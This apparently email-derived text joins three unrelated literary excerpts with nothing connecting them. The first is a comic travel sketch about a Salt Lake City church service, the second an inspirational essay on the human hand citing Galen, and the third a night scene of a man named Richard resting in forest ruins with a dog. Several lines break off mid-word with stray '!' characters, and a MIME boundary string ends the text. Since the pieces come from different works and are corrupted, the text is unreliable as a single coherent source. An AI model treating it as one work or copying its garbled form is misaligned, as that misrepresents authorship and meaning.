There are no ravishingly beautiful women present, and no positively ugly ones.The men are fair to middling. They will never be slain in cold blood for their beauty, nor shut up in jail for their homeliness. There are some good voices in the choir to-day, but the orchestral accompaniment is unusually slight. Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. Therefore trombones are tooted on Sundays in Utah as well as on other days; and there are some splendid musicians there. The Orchestra in Brigham Youngs theatre is quite equal to any in Broadway. There is a youth in Salt Lake City (I forget his name) who plays the cornet like a North American angel. Mr. Stenhouse relieves me of any anxiety I had felt in regard to having my swan-like throat cut by the Danites, but thinks my wholesale denunciation of a people I h!
ad never seen was rather hasty.


And the plaudits of men and of angels attend the young man today who has a worthy object in view, who believes in himself, and bends to the oars with might and main.An active hand symbolizes usefulness and thrift. Has it ever occurred to you what a wonderful piece of mechanism is that hand with which Nature has equipped you for seizing the oars of lifes activities? Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. Scientists regard the human hand as being the most remarkable organ, not vital, in the whole animal kingdom. It is conceded to be, also, the most pronounced physical characteristic differentiating man from the lower animals. The chimpanzee and the gorilla, closely allied to the human species in many respects, are noticeably deficient in the use of their modified hands; being able to grasp things only in a c!
umbersome way.

Tongue out of mouth trotted the little dog after him; crouched panting when he stopped an instant; rose weariedly when he started afresh.Now and then a large white night-moth flitted through the dusk of the forest. On a barren corner of the wooded highland looking inland stood grey topless ruins set in nettles and rank grass-blades. Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. He sat and eyed them, thinking not at all. His energies were expended in action. He sat as a part of the ruins, and the moon turned his shadow Westward from the South. Overhead, as she declined, long ripples of silver cloud were imperceptibly stealing toward her. They were the van of a tempest. He did not observe them or the leaves beginning to chatter.




------------1346345523503F9A33361C5--